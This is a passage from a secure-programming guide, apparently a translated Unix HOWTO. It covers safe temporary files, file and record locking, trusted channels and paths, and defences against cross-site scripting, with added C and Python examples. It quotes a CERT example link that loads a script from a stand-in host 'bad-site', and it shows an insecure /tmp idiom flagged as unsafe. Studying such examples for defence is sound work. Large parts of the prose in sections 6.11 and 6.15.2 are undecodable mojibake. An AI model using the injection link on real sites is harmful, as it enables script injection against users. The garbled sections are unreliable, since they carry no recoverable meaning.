tempnam is not safe to use, compilers and security scanners will nag
about it. With mkstemp(3) that is not a problem.

If a shell script needs temporary storage, it is usually better to use a
pipe, a local directory (somewhere under the user's home directory, for
instance) or, in some situations, the current directory, as appropriate;
then there is no sharing with other users. If you nevertheless want a
temporary file in a shared directory such as /tmp, the traditional shell
technique of appending the process id to a filename and writing to it
with ">" is unsafe. Shell scripts obtain the pid with "$$", and an
attacker can predict pids with ease, so the attacker can create the file
(or a link) under that name in advance. The traditional "handy" shell
idiom is therefore not secure:

   echo "This is a test" > /tmp/test$$  # DON'T DO THIS.               

If a shell script really does need a temporary file in /tmp, mktemp(1) is
the answer. mktemp(1) was designed for use from shell scripts. Note that
mktemp(1) and mktemp(3) are different things, and mktemp(1) is safe. This
is not to say that shell scripts should be keeping temporary files in a
shared directory: creating them in a private directory, or using a pipe,
is preferable. But when it is really needed, mktemp(1) generates a unique
name, creates the file or directory with O_EXCL, and finally prints the
name. Thanks to O_EXCL, this is safe even in a shared directory such as
/tmp (as long as NFS version 2 is not in use). Here are examples of using
mktemp(1) from the Bourne shell, taken directly from the mktemp(1) man
page:

 # Simple use of mktemp(1), where the script should quit               
 # if it can't get a safe temporary file:                              
                                                                       
   TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1                           
   echo "program output" >> $TMPFILE                                   
                                                                       
  # Simple example, if you want to catch the error:                    
                                                                       
   TMPFILE=`mktemp -q /tmp/$0.XXXXXX`                                  
   if [ $? -ne 0 ]; then                                               
      echo "$0: Can't create temp file, exiting..."                    
      exit 1                                                           
   fi                                                                  

Do not reuse temporary files (that is, delete one and then create it
again), even if a "safe" temporary file was obtained the first time. An
attacker may delete the original and substitute another file before the
second use. Give the file appropriate permissions: unless other users or
the group need to access it, do not grant them access; in other words,
use mode 0600 (read and write by the owner only).

Here is a small trick. If you do not need the name, exploit the way the
Unix file system works and unlink() the file as soon as you have created
it. The directory entry disappears, but the file itself stays accessible
until the last file descriptor referring to it is closed, so the program
can keep using the file through the descriptor. Unlinking the file also
helps maintenance: the file is removed automatically even if the program
crashes. The one thing to be aware of is that after the unlink an
administrator can no longer easily tell how much disk space the file is
using, because it no longer exists under any name in the file system.

If the values of the TMP and TMPDIR environment variables come from a
trusted source, code for Unix-like systems may honor them. That lets
users move their temporary files to a directory that is not shared, such
as a subdirectory of their home directory (the solution discussed above).
Recent versions of Bastille set these variables so that users do not
share a temporary directory with each other. Unfortunately, when a user
sets TMP or TMPDIR to a shared directory (such as /tmp), the secure
program must still create its temporary files securely even though the
variables are set. This is the one advantage of the GNOME approach: on at
least some systems, tempnam(3) honors TMPDIR automatically, whereas with
mkstemp(3) you have to write the code yourself. Do not invent new
environment variables for the temporary directory (something like TEMP),
and do not create application-specific ones either (nothing like
"MYAPP_TEMP"). Doing so makes the system as a whole too complicated, and
a user who wants a dedicated temporary directory for one application can
simply set the standard variable when running it. If the variables may
have been set from an untrusted source, ignore them; follow the advice in
Section 4.2.3 and you will be fine.

None of these techniques works when the temporary directory is a remote
directory mounted over NFS version 2 (NFSv2), because NFSv2 does not
support O_EXCL. See Section 6.10.2.1 for details. NFS version 3 and later
do support O_EXCL. Temporary directories should be local, or, if mounted
over NFS, mounted using NFS version 3 or later. Creating temporary files
securely over NFS v2 is possible with link(2) and stat(2), but it is
painful; Section 6.10.2.1 has the details.

As an aside, FreeBSD's recent change to stop the mk*temp() family from
putting the pid into the filename deserves attention. The pid was
replaced entirely by a random value encoded in base 62, which greatly
increases the number of possible temporary files with the "default" six
X's. It also means that mktemp(3) with six X's becomes (probabilistically)
safe against name guessing, provided it is not used too often. Whether
others will follow is up to them.

More information on temporary files is in Kris Kennaway's posting to
Bugtraq of December 15, 2000 on the subject
<http://lwn.net/2000/1221/a/sec-tmp.php3>.

 

6.10.2. Locking

Programs often need exclusive access to some resource (a file, a device,
a server process, and so on). Any resource locking scheme has to cope
with the well-known locking problems: deadlock (the "deadly embrace"),
livelock, and the release of "stuck" locks when a program does not shut
down cleanly. Deadlock occurs when programs wait for each other's
resources and none can proceed; for example, process 1 holds a lock on
resource A and waits for B, while process 2 holds a lock on B and waits
for A. Deadlocks of this kind are easy to prevent by having every process
that locks resources take the locks in the same order (for example,
alphabetically by lock name).

 

6.10.2.1. Using Files as Locks

On Unix-like systems, files have traditionally been used to lock
resources. This is highly portable. It also makes lock remnants easy to
"fix": a look at the file system shows which locks are set. Lock remnants
are left behind when a program does not finish cleanly (a crash or
malfunction, say) or when the whole system crashes. Note that this is
"advisory" locking, not mandatory locking: every process that needs the
resource must cooperate by using the lock. [Translator's note: file
locking comes in two forms, mandatory locking and advisory locking. With
mandatory locking the kernel watches the lock on behalf of the processes,
so the lock holds regardless of whether the processes cooperate; with
advisory locking the processes themselves lock, so the lock is only
effective among processes that agree to use it. For details see
linux/Documentation/mandatory.txt in the kernel source.]

There are things to watch out for, however. First, do not use the
technique found in old C programs: a create() call, or the equivalent
open() with mode O_WRONLY | O_CREAT | O_TRUNC, creating the file with
file mode 0 (no permissions). This works on ordinary file systems for
ordinary users, but it fails when the user has root privileges: root can
open the file even though it already exists, so the lock is lost. Older
Unix versions really did have this problem in their "ed" editor; parts of
the password file could end up as a user's file [Rochkind 1985, 22].
Instead, for locks that a process takes on a local file system, use
open() with the O_WRONLY | O_CREAT | O_EXCL flags (and, as before, give
the file no permissions, so that processes running under other names
cannot take the lock). O_EXCL is the official way to create an
"exclusive" file, and it works on local file systems even for root
[Rochkind 1985, 27].

The real problem arises when the lock file is created on a file system
mounted over NFS. NFS version 2 does not fully support the semantics of
ordinary files, which is a problem whenever a client assumes "local"
behaviour. Clients often have no local disk at all, with every file
remote-mounted over NFS. The open(2) man page discusses this case (and
mentions the root problem too):

"... O_EXCL is broken on NFS file systems; programs which rely on it for
performing locking tasks will contain a race condition. The solution for
performing atomic file locking using a lockfile is to create a unique
file on the same file system (e.g., incorporating hostname and pid), use
link(2) to make a link to the lockfile, and use stat(2) on the unique
file to check if its link count has increased to 2. Do not use the return
value of the link() call."

Any of these solutions works as long as every program that takes the lock
cooperates; a program that does not cooperate defeats them all. In
particular, do not give untrusted users permission to create or delete
files in the directory used for lock files.

NFS version 3 added support for the O_EXCL mode of open(2); see IETF RFC
1813, in particular the "EXCLUSIVE" value of the "mode" argument of
"CREATE". Unfortunately, not everyone has moved to NFS version 3 or
later, so a program that has to be portable cannot rely on this feature.
In the long run the problem will go away.

If you are locking a device or a process on the local machine, follow the
standard conventions. I recommend the Filesystem Hierarchy Standard
(FHS); Linux systems draw on FHS extensively, and it also incorporates
ideas from other Unix-like systems. FHS describes the locking
conventions, how the files are named and what their standard contents are
[FHS 1997]. To make sure that two instances of a server are not running
on the same machine, create a process identifier file, normally
/var/run/NAME.pid, containing the pid. Similarly, a lock file for a
device should be created like the device lock files in /var/lock. The
drawback of this approach is that if the program hangs or crashes
unexpectedly, the files are left behind. But since the convention is so
common, the system tools deal with that easily.

When cooperating programs provide locking through files, it is important
to use the right directory for the files. On networked systems this
becomes a problem: FHS states explicitly that /var/run and /var/lock are
not shared, while /var/mail is. If you need a lock that applies to a
single machine and is unaffected by other machines, use an unshared
directory such as /var/run (for example, when a separate server runs
independently on each machine). If all the machines share a file over
the network and every machine must honor the lock, use a shared
directory; /var/mail is one such place. Section 2 of the FHS has more on
this.

 

6.10.2.2. Other Approaches to Locking

Of course, you do not have to use files for locking. Network servers
rarely need to worry about it at all: binding to a port can serve as the
lock, since once a server is bound to a port no other server can bind to
it.

Another way to lock is with POSIX record locks, implemented through
fcntl(2) as "discretionary locks". They are discretionary in the sense
that using them is optional: the programs that need the lock must
cooperate (just as with file-based locks). There are several reasons to
recommend POSIX record locks: they are supported on nearly every
Unix-like platform (POSIX.1 mandates them), they can lock part of a file
rather than the whole file, and they distinguish read locks from write
locks. Furthermore, the locks are released automatically when the process
dies, which is usually what you want.

There is also mandatory locking, based on the System V mandatory locking
facility. It applies only to files that have the setgid bit set but not
the group execute bit, and the file system must be mounted with mandatory
locking enabled. Each read(2) and write(2) then checks for locks, which
makes it slower than advisory locking. Mandatory locking is also not
widely portable among Unix-like systems (Linux and System V-based systems
have it; others do not necessarily). And since even a root process can be
stopped by a mandatory lock, it can be a source of denial-of-service
attacks.
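The fcntl(2) record locking described above, as an added C example that is not code from the HOWTO. A child process plays the part of a second locker (POSIX locks are held per process, so two descriptors in one process would not conflict), and the second half shows the automatic release when the holder closes its descriptor. The lock file under /tmp and the function names are constructed for the demonstration; fork() and a local file system are assumed.

```c
/* Added example (not the HOWTO's code): advisory POSIX record locking with
 * fcntl(2).  The lock covers the whole file, is released when the holder
 * closes the file or exits, and a second process sees it as busy. */
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Try to take an exclusive write lock on the whole file without blocking.
 * Returns 0 if acquired, 1 if another process holds it, -1 on error. */
int try_lock_whole_file(int fd)
{
    struct flock fl;
    memset(&fl, 0, sizeof fl);
    fl.l_type = F_WRLCK;
    fl.l_whence = SEEK_SET;
    fl.l_start = 0;
    fl.l_len = 0;                         /* 0 means "to end of file" */
    if (fcntl(fd, F_SETLK, &fl) == 0)
        return 0;
    if (errno == EACCES || errno == EAGAIN)
        return 1;
    return -1;
}

/* Run the lock attempt in a child and report what it saw (0 = got the
 * lock, 1 = busy, 2 = error).  The child exits at once, so any lock it
 * took is released again immediately. */
static int child_sees_lock(const char *path)
{
    pid_t pid = fork();
    int status;
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd = open(path, O_RDWR);
        int r = (fd < 0) ? -1 : try_lock_whole_file(fd);
        _exit(r < 0 ? 2 : r);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Demonstration on a constructed lock file: busy while held, free again
 * once the holder closes its descriptor.  Returns 1 if both observations
 * match. */
int demo_record_locking(void)
{
    char path[] = "/tmp/lockdemoXXXXXX";
    int fd = mkstemp(path);
    int ok = 0;
    if (fd < 0)
        return 0;
    if (try_lock_whole_file(fd) == 0 &&
        child_sees_lock(path) == 1) {     /* held: the child is refused */
        close(fd);                        /* closing releases the lock */
        fd = -1;
        if (child_sees_lock(path) == 0)   /* released: the child gets it */
            ok = 1;
    }
    if (fd >= 0)
        close(fd);
    unlink(path);
    return ok;
}

int main(void)
{
    printf("record lock excluded a second process and was released: %s\n",
           demo_record_locking() ? "yes" : "no");
    return 0;
}
```

One caveat worth remembering with POSIX record locks: closing any descriptor for the file in the holding process releases all of that process's locks on the file, not only the one taken through that descriptor.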

 

6.11. Trust Only Trustworthy Channels

In general, trust only information (input or results) that arrives
through a trustworthy channel. For example, a local user can control what
getlogin(3) and ttyname(3) return, so do not rely on them for security
purposes.

On most computer networks (the Internet as a whole certainly included),
nothing is trustworthy unless its origin has been proven. A packet on the
open Internet, for instance, can be read and modified at any point along
its route, and new packets can be forged. A forged packet may claim any
origin (machine address (IP) and port). Therefore, unless a packet has
been authenticated (cryptographically, for example), do not base
security decisions on any of those values.

܂ȎȂATCP/IP Ń[UF؂sꍇ́AF؂̎dg
݂ƂĉL 2 ̌ÏLeNjbNPƂł͎gpȂ悤ɂĂ
BeNjbN 1 ́A[Uu}Vvɐ@ŁAf[
^pPbg̃}V́un_vAhX`FbN܂B̕@
́A肪uMłv|[gԍ(1024 Ԉȉ)̗pv邱Ƃ
āAANZX܂B́ÅɂāAU҂
̒l₂ł_ɂ܂B

Checking these values (the sending machine's IP address and port number)
is still meaningful in some settings, so supporting such checks as an
option in your program is not a bad idea. For example, on a system behind
a firewall, unless the firewall has been breached or bypassed, a packet
that claims to come from inside really does come from inside, provided
the firewall drops packets arriving from outside that claim an inside
address. Note that this still does not confirm that the packet came from
the particular machine it claims to come from. So this only copes with
outside threats, not inside ones. And as soon as the firewall is
bypassed, or another route or a mobile connection is allowed in, the
assumption becomes questionable.

The point is that the means of authentication must itself be trustworthy.
If you need a trustworthy channel across an untrustworthy network, some
cryptographic technique is required (at the very least a
cryptographically secure hash). Section 10.5 has more on cryptographic
algorithms and protocols. Where a fundamentally insecure protocol (ftp or
rlogin, say) is the standard one, do not use it by default, and state the
precondition plainly in the documentation.

The Domain Name Server (DNS) is used across the Internet to maintain the
mapping between computer IP addresses (numbers) and names. A "DNS reverse
lookup" rules out some of the simpler spoofing and helps identify a
host, but it does not provide anything like the confidence that
authentication needs. The problem is that a DNS request may be redirected
to some other system, possibly one the attacker controls, so a DNS result
has to be verified before it is used, and it should not be trusted as the
basis for an important access decision.

Electronic mail (including the address on the "From" line) can be forged.
Signatures can prevent such attacks. A simpler defense is to send a
random number to the mail address and require it to be sent back; that is
quite enough for something like a mailing-list subscription, where the
rules are not strict.

In a client-server model, CGI included, the client (or anything sitting
between client and server) can change any value, and the server must be
aware of that. In particular, "hidden fields" and cookies can be changed
by the client before the CGI program ever sees them, so they cannot be
trusted unless precautions are taken. For example, a hidden field that
the server never checks is no obstacle to a client that wants to forge
it. Hidden fields can be encrypted with a key held only by the trusted
server (Kerberos authentication puts a similar idea at its foundation).
InfoSec Labs (http://www.infoseclabs.com/mschff/mschff.htm) has a more
thorough discussion of encrypting hidden fields. In general, in a
client-server model, data that must be trusted should be kept on the
server. For the same reason, do not rely on HTTP_REFERER when
authenticating in a CGI program: it is sent by the user's browser, not by
the web server.

The same problem applies to data that refers to other data. HTML and XML,
for example, can reference other files (DTDs and style sheets, say) that
are fetched remotely. Those external references can be changed, so the
user may end up with a document quite different from the one the author
intended. A style sheet can change how a document is rendered, hiding
important words or "repositioning" them, and can insert new text or
images. An external DTD can insert different text into the document too
(a DTD can declare entities used within the document), so it too is a way
to alter the document [St. Laurent 2000].

 

6.12. Set up a Trusted Path

Related to trustworthy channels (see Section 6.11) is the need, in some
situations, for the program or system a user is working with to prove to
the user that it really is the genuine program.

The classic example is the "fake login" program. It displays a screen
that looks exactly like the system's login screen; when the user tries to
log in, the fake login program captures the user's password for later
use.

The countermeasure is a "trusted path": a simple mechanism that assures
the user that the information reaching them comes from where they think
it comes from, and that what they send cannot be intercepted or altered
by an attacker.

If a password is required, try hard to provide a trusted path.
Unfortunately, most Linux distributions and Unix systems provide no
trusted path for the ordinary login procedure. One approach is to require
an unforgeable key sequence before login. Windows NT and 2000 users, for
instance, press "control-alt-delete" before logging in; an ordinary
Windows program cannot intercept that combination, so it serves as a
trusted path. Linux has a similar mechanism, the Secure Attention Key
(SAK) <http://lwn.net/2001/0322/a/SAK.php3>, which recommends the
"control-alt-pause" combination. At the time of writing, SAK is
implemented but not something you can expect a Linux distribution to
support. Another way to build a local trusted path is for the login
program to control something that is independent of the display. If no
untrusted program could change the keyboard lights (the Num Lock, Caps
Lock and Scroll Lock LEDs), for instance, the login program could blink
them in a particular pattern to prove it is the genuine login program.
Unfortunately, ordinary users on current Linux systems can change the
LEDs, so they cannot be used for a trusted path.

Less obviously, network applications have the same problem. A trusted
path makes sense for network applications too, but it is much harder to
achieve. When passwords travel across a network, send them only over a
channel that is both trusted and encrypted; otherwise an attacker who is
not even connected to the system can steal the password, and the damage
will not stop there. If you cannot guarantee a trusted path, at least
make sure the connection is encrypted and authenticated (authenticated
as the bare minimum).

In general, network applications cannot establish a trusted path, and
this is especially true of web-based applications. A well-known trick is
to make a web browser user believe they are at one place when they are
really at another. Felten [1997], for instance, discusses "web spoofing":
the user believes they are looking at the pages of a trusted web site,
but every page of that site is in fact being relayed through the
attacker's site (which can see all the traffic and change any data in
either direction). The URL is a clue, but with the right techniques
(Javascript and the like) almost every trace can be hidden, leaving
little more than the status bar and location bar to go on; the paper has
the details. There is another URL-hiding technique, using a rarely seen
URL form: the URL "http://www.ibm.com/stuff@mysite.com" is in fact a
request to "mysite.com" (a malicious site, say) with the user name
"www.ibm.com/stuff". If the URL is long enough, the real site is never
displayed, and most users will not notice the deception. Along the same
lines, an attacker can register a site whose name is deliberately similar
to that of the "real" site, so that users cannot tell them apart. In all
of these cases, simply encrypting the traffic achieves nothing: the
attacker controls the decryption, or can obtain the decrypted data.

This problem is very hard to deal with. I know of no technical method
that protects a "deceived" web user today. Web browser developers are
expected to make such "deceptions" easier to see through. Where it matters
to the user that they are connected to the right site, they need simple
procedures to counter the threat: for example, quit the browser, restart
it, and check the web address carefully against the one they meant to use
(mistakes are still possible). Also bear in mind that DNS itself can be
"spoofed"; if the DNS has been subverted, the attacker may succeed in
spite of the user's care.

 

6.13. Use Internal Consistency-Checking Code

A program should check that its call arguments and basic state
assumptions are valid. In C, a macro such as assert(3) is useful for
these checks.

 

6.14. Self-limit Resources

Network daemons should defend themselves against overload. Set limits on
the resources they may use (with setrlimit(2)). In particular, use
setrlimit(2) to prevent "core" files from being created: by default,
Linux writes a core file containing all of a program's memory when the
program fails abnormally, and that memory may contain passwords and other
secret data.

 

6.15. Prevent Cross-Site (XSS) Malicious Content

Some secure programs accept data from an untrusted user (the attacker)
and pass it on to another user's application (the victim). If the secure
program does not protect the victim, the victim's application (such as a
web application) acts on that data and the victim is harmed. This is a
particular problem for web applications using HTML or XML, where the
issue goes by the names "cross-site scripting", "malicious HTML tags" and
"malicious content". This document calls the problem "cross-site
malicious content": the trouble is not with scripts or HTML as such, but
with the cross-site nature of the data. The problem is not limited to web
applications, but it is especially serious for them, so the rest of this
discussion concentrates on web applications. Note too that an attacker
may be able to trick the victim into sending the data to the secure
program themselves, and the secure program still has to protect the
victim.

 

6.15.1. Explanation of the Problem

Let us start with a simple example. Some web applications accept user
data containing HTML tags and display it to many readers (a guestbook,
say, or a "readers' comments" section). Without some means of defense, a
user who can insert tags can attack those readers: by embedding scripts
or references to Java, DHTML tags, an early end to the document (with
</HTML>), or a request for a gigantic font size, and so on. The effects
reach surprisingly far. Such content can trick users into believing a
connection is encrypted with SSL, reach web sites that are accessible
through the victim's client (behind a firewall, say), violate
domain-based security policies, make the web site's pages unreadable or
embarrassing (replacing banners with unsuitable material, for instance),
violate privacy (a "web bug" that records who reads which pages), mount
denial-of-service attacks (opening windows "forever"), and carry out
destructive attacks (exploiting vulnerabilities in the browser's
scripting or a buffer overflow). Inserting a malicious FORM tag at the
right spot can trick unsuspecting users into submitting private
information (by changing where the form's data is sent). This is not a
complete list, but it should be enough to show that the problem is
serious.

Most of the trouble lies in "displays": almost every display includes
text that others have contributed as part of a discussion. Unfortunately,
most web application developers do not realise how general the problem
is. Anywhere one user's data is shown to another user is a possible point
of injection of cross-site malicious content, even when the HTML involved
is "simple" or "obviously suspicious". Users can be tricked into sending
the malicious data themselves, and into routing it through the site.
Here is an example of an HTML link that makes the user send malicious
data to another site (the example is CERT's):

 <A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT             
 SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>              

Some web applications accept input (form data included) without any
check or filter, and in many cases the web application then returns that
input to a user, often a different user from the one who supplied it.
Components of this kind can do great damage to the system, because the
system's own users become the path of the attack. Worse, the attack
appears to originate from the system itself.

CERT describes the problem in short form like this:

   
    A web site may inadvertently include malicious HTML tags or script in
    a dynamically generated page based on unvalidated input from
    untrustworthy sources (CERT Advisory CA-2000-02, Malicious HTML Tags
    Embedded in Client Web Requests
    <http://www.cert.org/advisories/CA-2000-02.html>).
   
 

6.15.2. Solutions to Cross-Site Malicious Content

Fundamentally, whatever user the web application's output is influenced
by, you have three choices: filter (remove the problem characters),
encode (render the problem characters harmless), or validate (let only
"safe" data through). This applies to everything that arrives as input:
URL parameters, form data, cookies, database query results, results from
a CORBA ORB, user data stored in files, and so on. Filtering and
validation are mostly done at input time, while encoding can be done
either at input validation or when the output is generated. If data has
passed through without being handled at input time, you must encode it
when you generate the output (and it is easy to forget). For data of
unknown shape, encoding at output time is easier than at input time. CERT
recommends filtering and encoding at output time; input-time handling is
simpler, so in practice many cases are handled at input. Covering every
case at output time is very hard, and neither approach is trivial.
[Translator's note: CORBA (Common Object Request Broker Architecture) and
its ORB (Object Request Broker) are not explained here; for an
introduction see the article on distributed objects at
<http://www.atmarkit.co.jp/fjava/rensai2/objetry01/objetry01.html>.]

A caution: if you cannot control the character encoding of the output,
these techniques may not help at all. An attacker can use an "unexpected"
encoding to defeat them. Fortunately, controlling the encoding of the
output is easy; Section 8.5 discusses it.

The subsections below first discuss how to identify the special
characters that need filtering, encoding or validation, and then how to
filter or encode them. There is no subsection on the general techniques
of validating data; for validating input in general see Chapter 4, and
for input that is itself HTML text or a URI see Section 4.10. Also,
because web applications receive cross-site malicious postings, do not
use the GET method for anything other than queries (see Section 4.11).

 

6.15.2.1. Identifying Special Characters

ł́A܂܂Ȋɂꕶڂ܂B (̈ꗗ쐬
 CERT Ɋӂ܂)

 E ubNx̗vf(Ƃ΁AHTML  XML ̃ubNɊ܂܂eL
    Xg̃pOtɓoꂷ)
   
      u<v́A^OJnƂӖœłB
       
      u&v́AGeBeB͂܂ƂӖœłB
       
      "ugt;v́AuEU̒ɓʈ̂AƂ
        œłB̃y[W̒҂A{͊Jńu<" u
        ̂ɁAԈďȂĂ܂ƂOłB
       
 E lɂ
   
      dpň͂܂ꂽlɂāAdp͑l̏I[
        ƂƂœłB
       
      dpň͂܂ꂽlɂāAdp͑l̏I[
        ƂƂœłB XML ł͈dp͐Kł͂ȂƂ
        ӂĂBdp͎gȂ悤܂B
       
      pĂȂlł́AXy[X^uƂ
        ʈɂȂ܂B XML ł͐K̂̂łȂłȂA
        ɑ̕ʈɂĂ܂ƂɒӂĂB
        ܂AIɒl𐶐̂gĂȂAptȂ
        gp͎̂^ł܂B
       
      u&v́AGeBeB̎n_ɂȂĂ邽߁A
        ̂ɎgpƂƂœłB
       
 E Ƃ URL ɂƂƁA錟GW͌ʂ̃y[W\
    Ãy[W̃N[UNbNČĎsł
    ܂B̋@\́ANG URL ɕ邱ƂŎĂ
    ܂BsƁAǉ̓ꕶ荞݂܂B
   
      Xy[X^uAśAURL ̏I[̈ƂȂ̂œłB
       
      u&v́AGeBeB̂͂܂łACGI ̃p^
        ͂܂ł肷ƂƂœłB
       
      ASCII ł͂Ȃ(ISO-8859-1  128 ȏ) URL ł͔F߂
        Ă܂B URL  ASCII ł͂Ȃ͓ł
        B
       
      u%v͓͂ŃtB^Ȃ΂܂B HTTP ̃GXP[v
        V[PXŕꂽp^łĂAT[oŎg
        ĂR[h֕Ȃ΂܂B͂u%68%65%6C%6C%6F
        vȂAtB^ Web TCg̃y[Wł́uhellov
        Ȃ܂B
       
 E <SCRIPT>  </SCRIPT> ň͂܂ꂽɂZ~R⊇ʁA
    AśÃXNvgE^OɒڃeLXg}ł󋵉
    ̓tB^ׂłB 
   
 E T[õXNvgœ͂ɂ銴Q(!)o͂œdp(") ɕ
    ȂAɒǉŃtB^KvɂȂ܂B
   
ʓI HTML  XML ɂẮAApTh(&)͓ꈵłB

 

6.15.2.2. Filtering

̓ꕶ@̈ɁAPɓꕶ폜Ă܂Ƃ
肪܂(ʏ͓͂Əo͂̊Ԃ)B

ɐ𓾂邽߂ɓ͂؂ĂȂ(ׂł)A
̈ꗗꕶ菜̂͊ȒPłBɁAPerl ŏt
B^ڂĂ܂B̃tB^͐ȕ󂯕tA󔒈
Ôǂȓꕶ󂯕t܂̂ŁAp̂悤ȕŎgp
̂ɂȂLłB

 # Accept only legal characters:
 # (tr///dc: /c complements the list, /d deletes every character not in it)
 $summary =~ tr/A-Za-z0-9\ \.\://dc;

A{ɍŒ̕菜ȂA̕폜
Tu[`Ăǂł傤B

 sub remove_special_chars {
  my ($s) = @_;                       # copy the argument ('my', not 'local')
  $s =~ s/[\<\>\"\'\%\;\(\)\&\+]//g;  # strip < > " ' % ; ( ) & +
  return $s;
 }
 # Sample use:
 $data = &remove_special_chars($data);

 

6.15.2.3. Encoding

ꕶ폜ʂ̕@ɁAꕶ𕄍ēȈӖȂ
Ă܂܂B̕@́AɃtB^@ɑ
Ď኱AɃf[^肱ڂȂ_DĂ܂B[U
猩āAtB^ߒŃf[^u߂ႭvɂȂȂAȂ
ƂĂ΁AXĂf[^̍č\\ɂȂ܂
B

HTML  XMLASGML ͊FAApTh(u&v){ŉ炩̕
܂镶ƂĎgĂ܂B́̕uHTML GR[hvƂ悭
Ă܂B̕𕄍ɂ́Åœꕶ
ϊĂ邾łBʂ́Au<vu&lt;vAu>vu&gt;vAu&
vu&amp;vAu"vu&quot;vƂȂ܂BLŒӂȂ΂Ȃ
̂́Áu>v͂ŋKv͂Ȃ̂łAuEUɂ́u>
vĂ܂̂̂(u<vĂ܂)Aŋ邱
Ƃɂ܂Bdpʓ|ŁAu&quot;vgKv̂͑
łAÂuEUɂ͂ƕ\łȂ̂܂B
ɕGɂȂĂ܂ȂȂAKvɉāu"v𕄍Ă
܂񂪁APɕ₳̂ŁA[UɃuEŨo[W
Abv肢ĂB

 HTML GR[fBOɑ΂@́A󋵂ɂĂ͕\
łȂP[X܂B Section 8.5 Ř_Ă܂Ao͕̕
(uZbgv)w肵ĂKv܂Bo͕̕Ƃ͕
̕gĕ𕄍Ăf[^ȂA炩̎ł
Kv܂BȂƏo͂ɐȂȂAʂɂȂ
B܂ ISO-8859-1 ȊOŕďo͂ȂAƂȂ镄
łAuEUɓꕶ(u<v̂悤)̕ēnȂ
ɂĂB̂̃P[XłꂪɂȂ܂B
LgĂ̂ł́A UTF-7  UTF-8 ɓ܂Bu
ƂȂv̕h@ɂĂ̏ڂɂẮASection
4.8 ĂB̖݊@̈ɁA܂
Iɂ ISO 10646 (Unicode Ɠl)ɕϊĂ܂@
܂BĂāAւ̎QƂ͕GeBeBւ̎Q
gāA\܂B

 E ւ̎QƂ́Au&#D;v̂悤ɍs܂BD  10 iłB
    Au&#xH;v́u&#XH;vƂ܂BH  16 iłB̐
    ́AISO 10646 R[hł(Unicode Ɠlł)B܂ &#
    1048; ̓L̑啶́uIvłB SGML Ki(ISO 8879)ł 16
    inT|[gĂ܂̂ŁAo͂ɂ 10 ingp悤
    ɂE߂܂B܂ SGML ̎dlł́AŌ㑱̃Z~R
    ̏ȗF߂Ă܂BۂɁAVXȇł͈܂B
    āAɃZ~Rɕt悤ɂĂB
   
 E GeBeBւ̎QƂ́A悤Ȃ̂łÂɊo
    ₷OgĂ܂BƂ΁Au&lt;v < \킵܂B
    HTML ĂȂA HTML dl <http://www.w3.org> Ɋo₷
    OׂĈꗗɂĂ܂̂ŁAĂB
   
ǂ̌n(͕GeBeB)ł܂܂Bu<vu>
vAu&vAu"vւ̎QƂ͕GeBeBgƂE߂܂B
R̓R[h(o)ĉ₷łBƂ͂낢ŁAǂ̌n
SʓIɗDĂ邩A͂肵܂BƂŐlŏo͂ҏW
ȂAGeBeBgƂɂ͎gĂBȂ
΁AvOȒPɂȂƂRŁA10 iŕQƂ悤ɂ
܂B̃̕v́AɂĂ͂܂ɗ܂(Ƃ
AWǍł)BɎgpRečȂAʂ̕
(Zbg) IAȂ(Ƃ΁u<v)tB^悢
܂BȂF߂Ă܂悤ȑ́̕AĂ
悤ɂĂB

URI ͓Ǝɕ̎dg݂pӂĂ܂Bʏ͂uURL GR[
fBOvƌĂł܂B̌nł́AURL ɔF߂Ȃp[Z
gĽ 2  16 ilgĕ\܂B ISO 10646(Unicode)
߁A܂R[h UTF-8 ɕϊĂ畄邱Ƃ
܂B URI ̌؂ɂĂ Section 4.10.4 łɘ_Ă܂̂ŁA
ĂB
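The three steps of 6.15.2 (identify the special characters, filter, encode) applied to one field of web input, as an added Python example that is not part of the HOWTO. SAMPLE_INPUT and the function names are constructed here; the allowed-character set mirrors the Perl tr/// filter in 6.15.2.2, and the %-decoding step uses the %68%65%6C%6C%6F case from 6.15.2.1. The filter and the encoder go slightly beyond the text in also treating the apostrophe as special (encoded as &#39;, since HTML 4 has no named entity for it).

```python
import re
from urllib.parse import unquote

# Constructed sample of user-supplied comment text (not from the original document).
SAMPLE_INPUT = "Nice page! <script src='http://bad-site/badfile'></script> %3Cb%3Ehi%3C/b%3E"

# Characters that are special in HTML/XML body text and attribute values (6.15.2.1).
HTML_SPECIAL = {"<", ">", "&", '"', "'"}
ENTITY_NAMES = {"<": "&lt;", ">": "&gt;", "&": "&amp;", '"': "&quot;", "'": "&#39;"}


def decode_url_encoding(s):
    """Undo %HH escapes before any filtering, so the filter sees the real characters
    (otherwise %3C would slip past a check for '<')."""
    return unquote(s)


def find_special_chars(s):
    """Report which HTML-special characters a string contains."""
    return {c for c in s if c in HTML_SPECIAL}


def whitelist_filter(s, allowed="A-Za-z0-9 .:"):
    """Keep only characters from an allowed set (the Python counterpart of the
    Perl tr/A-Za-z0-9 .://dc filter in 6.15.2.2)."""
    return re.sub("[^" + allowed + "]", "", s)


def remove_special_chars(s):
    """Blacklist variant: strip the characters the Perl remove_special_chars sub strips."""
    return re.sub(r"[<>\"'%;()&+]", "", s)


def html_encode(s, numeric=False):
    """Encode the HTML-special characters so they are displayed, not interpreted (6.15.2.3).
    numeric=True emits decimal character references (&#60;) instead of named entities;
    both forms carry the closing semicolon, which the text recommends never omitting."""
    out = []
    for c in s:
        if c in HTML_SPECIAL:
            out.append("&#%d;" % ord(c) if numeric else ENTITY_NAMES[c])
        else:
            out.append(c)
    return "".join(out)


def sanitize_for_display(raw):
    """The full pipeline for one field: URL-decode, then encode for HTML output."""
    return html_encode(decode_url_encoding(raw))


if __name__ == "__main__":
    decoded = decode_url_encoding(SAMPLE_INPUT)
    print("special characters present:", sorted(find_special_chars(decoded)))
    print("whitelist-filtered:", whitelist_filter(decoded))
    print("encoded for display:", sanitize_for_display(SAMPLE_INPUT))
```

Decoding comes first on purpose: filtering or encoding the still-escaped text would leave %3C in place and the browser would later turn it back into '<'. Encoding is preferred over filtering wherever the data is only displayed, because nothing the user typed is lost.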

 

6.16. Foil Semantic Attacks

